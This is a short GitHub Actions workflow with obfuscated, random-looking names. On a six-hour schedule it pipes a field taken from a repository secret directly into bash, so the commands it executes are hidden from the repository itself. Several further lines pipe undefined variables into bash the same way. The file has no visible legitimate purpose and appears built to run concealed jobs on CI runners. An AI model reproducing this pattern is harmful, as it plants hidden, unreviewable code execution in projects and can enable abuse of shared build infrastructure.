name: sichuoch

on:
  workflow_dispatch:
  schedule:
    - cron: '53 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sichuoch
        env:
          tewie19: ${{ secrets.tewie19 }}
        run: |
          echo $tewie19 | jq -r .curuv19215 | /bin/bash
          echo $urlh11 | jq -r .ytff7 | /bin/bash
          echo $q85117 | jq -r .ln914 | /bin/bash
          echo $bgi57 | jq -r .zdsgh01 | /bin/bash

